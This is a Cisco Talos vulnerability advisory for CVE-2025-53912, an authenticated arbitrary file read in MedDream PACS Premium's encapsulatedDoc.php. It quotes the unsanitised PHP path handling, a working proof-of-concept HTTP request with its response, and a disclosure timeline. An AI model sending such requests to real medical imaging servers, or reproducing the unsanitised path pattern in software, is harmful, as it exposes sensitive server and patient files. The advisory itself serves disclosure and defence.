CVE-2025-53912
An arbitrary file read vulnerability exists in the encapsulatedDoc functionality of MedDream PACS Premium 7.3.6.870. A specially crafted HTTP request can lead to an arbitrary file read. An attacker can send http request to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
MedDream PACS Premium 7.3.6.870
MedDream PACS Premium - https://meddream.com/products/meddream-pacs-server/
9.6 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N
CWE-73 - External Control of File Name or Path
MedDream PACS is a DICOM 3.0-compliant server for storing, managing, and retrieving medical images. It includes a web-based DICOM viewer and administration interface, with features like user access control, study forwarding, and multi-format image support.
A post-authentication arbitrary file read vulnerability exists in the functionality of the Pacs/encapsulatedDoc.php script.
The vulnerable code looks in the following way:
/// line 13
$path = urldecode($_GET['path']); /// [1]
$mimetype = urldecode($_GET['mimetype']);
global $ENCAPSULATED_DOC_ICON_TBL;
if (!isset($ENCAPSULATED_DOC_ICON_TBL[ strtoupper($mimetype) ])) {
print "<h2><font color=red>";
printf(pacsone_gettext("Unknown MIMETYPE: %s"), $mimetype);
print "</font></h2>";
exit();
}
$type = "Content-type: $mimetype";
header($type);
$fp = fopen($path, "rb"); /// [2]
fpassthru($fp);
fclose($fp);
?>
As we can see in the line [1] attacker is fully controlling variable $path which is not sanitize/limited to any specific directory. That situation in further parts of code [2] leads to arbitrary file read.
An attacker exploiting this vulnerability can read sensitive files located on the server, which could ultimately lead to arbitrary code execution.
Example of request triggering this vulnerablity is presented below:
GET /Pacs/encapsulatedDoc.php?path=c:\test\secret.txt&&mimetype=application/pdf HTTP/1.1
Host: 192.168.0.42
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: sessionCookie=%D0%009T-GQb%04wM%D1D%22%17Z%D2%09b~%3D%EB%C1%11_%3D%FC%2C%B59%82%20; PHPSESSID=d92c6a70310515c9c11b928a9fb86bee; MEDDREAMSESSID=89F9D14757A096B63E147238A622FC72
Upgrade-Insecure-Requests: 1
Priority: u=0, i
RESP
HTTP/1.1 200 OK
Date: Tue, 19 Aug 2025 16:43:42 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 7
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/pdf
omg!!!
2025-09-02 - Vendor Disclosure
2025-12-05 - Vendor Patch Release
2026-01-20 - Public Release
Discovered by Marcin 'Icewall' Noga of Cisco Talos.